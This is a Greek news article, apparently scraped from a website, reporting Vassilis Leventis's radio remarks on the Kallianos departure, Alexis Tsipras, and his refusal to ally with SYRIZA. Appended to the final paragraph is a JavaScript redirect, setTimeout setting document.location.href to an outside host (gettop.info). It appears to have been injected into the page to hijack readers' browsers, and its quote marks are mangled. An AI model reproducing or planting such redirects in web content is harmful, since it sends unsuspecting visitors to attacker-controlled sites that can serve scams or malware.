Λεβέντης για Καλλιάνο: Δεν είναι κακό παιδί, χρησιμοποιείται τώρα

0
6

 

Τα δημοσιεύματα που τον φέρουν να συνοδεύει τον πρωθυπουργό στο ταξίδι του στη Νέα Υόρκη όπου θα δώσει «παρών» σε φόρουμ διαψεύδει ο πρόεδρος της Ένωσης Κεντρώων λέγοντας ότι είχε παντελή άγνοια για την παρουσία του Αλέξη Τσίπρα στην πόλη του Μεγάλου Μήλου.

«Έχω κληθεί από διμήνου στο φόρουμ αυτό, χωρίς να γνωρίζω ότι θα είναι ο πρωθυπουργός. Από τις εφημερίδες έμαθα ότι έχουμε κανονίσει να είμαστε και μαζί. Είναι ευφάνταστοι οι δημοσιογράφοι. Εγώ έχω βγάλει εισιτήρια για τις 17. Δεν γνωρίζω πως θα πάει ο πρωθυπουργός» δήλωσε ο πρόεδρος της Ένωσης Κεντρώων.

Μιλώντας στον Βήμα FM αναφορικά με την αποχώρηση Καλλιάνου είπε πως «ο κ. Καλλιάνος χρησιμοποιείται τώρα. Δεν είναι κακό παιδί. Αυτός ισχυρίστηκε ότι του είπα ‘θα σε διώξω αν ξανακάνεις κριτική στον ΣΥΡΙΖΑ’, ενώ εγώ κάνω μεγαλύτερη κριτική. Πώς μπορώ να απαγορέψω από τον συνεργάτη μου να κάνει και εκείνος αυτό που κάνω εγώ;».

Σχολιάζοντας τον Αλέξη Τσίπρα είπε πως «ο πρωθυπουργός μέσα του δεν είναι άδικος άνθρωπος. Είδε έναν Βασίλη Λεβέντη, που μετά από διασυρμό και κακοποίηση 35 ετών, μπήκε στη Βουλή και έχει πέντε απόψεις. Να μην το εκτιμήσει αυτό; Έχει ωριμάσει, είναι ρεαλιστής».

Απέκλεισε την πιθανότητα συνεργασίας της Ένωσης Κεντρώων με τον ΣΥΡΙΖΑ λέγοντας «να μην ψηφίσει κανένας την Ένωση Κεντρώων, στις επόμενες εκλογές, αν κάνω την όποιας φύσεως συνεργασία με τον ΣΥΡΙΖΑ! Δεν μπορώ να συνεργαστώ, γιατί εγώ έχω ορκιστεί στους ψηφοφόρους της Ένωσης Κεντρώων, το 4% που μου δώσανε μετά από 35 χρόνια, να το κάνω 14, 15%? Για λάφυρα δεν ενδιαφέρθηκε ποτέ η Ένωση Κεντρώων. Ενώ τώρα ο κ. Τσίπρας σχημάτισε μία κυβέρνηση νομής λαφύρων. Έδωσε πέντε υπουργεία στον κ. Καμμένο και τελείωσε η συζήτηση». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here